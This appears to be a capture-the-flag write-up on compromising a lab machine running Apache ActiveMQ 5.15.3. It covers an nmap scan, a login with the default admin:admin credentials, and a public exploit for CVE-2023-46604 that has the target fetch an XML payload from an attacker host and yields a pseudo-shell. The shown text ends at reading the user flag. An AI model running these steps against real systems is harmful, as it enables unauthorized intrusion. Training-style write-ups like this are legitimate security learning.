We are given the IP of a machine, and start with a nmap scan to identify which ports are open.
$ nmap -T 5 -p- -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 00:16 CET
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
1883/tcp open mqtt
5672/tcp open amqp?
8161/tcp open http Jetty 9.2.22.v20170606
39959/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
61614/tcp open http Jetty 9.2.22.v20170606
61616/tcp open apachemq ActiveMQ OpenWire transport
Port 8161 leads to an ActiveMQ
website, which has links to /admin
and /demo
. The demo-endpoint gives a 404, while the admin-endpoint prompts us for login credentials.
The default credentials for ActiveMQ is admin:admin
, and we can login as admin, however other than revealing that the ActiveMQ version is 5.15.3
this path does not lead to anything.
This version of ActiveMQ has a deserialization vulnerability, CVE-2023-46604, which gives attackers remote code execution. We can use this POC to exploit the vulnerability and get shell on the server.
$ python3 exploit.py -i -si <attacker_ip>
# CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell #
# Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d #
[*] Target:
[*] Serving XML at: http://<attacker_ip>:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit
# Not yet connected, send a command to test connection to host. #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you #
# want to re-check the connection. #
[Target not responding!]$ id
uid=998(prime) gid=995(prime) groups=995(prime),0(root) context=system_u:system_r:unconfined_service_t:s0
We get shell as the user prime
, which can read the flag from /home/activemq/user.txt
Apache ActiveMQ$ cat /home/activemq/user.txt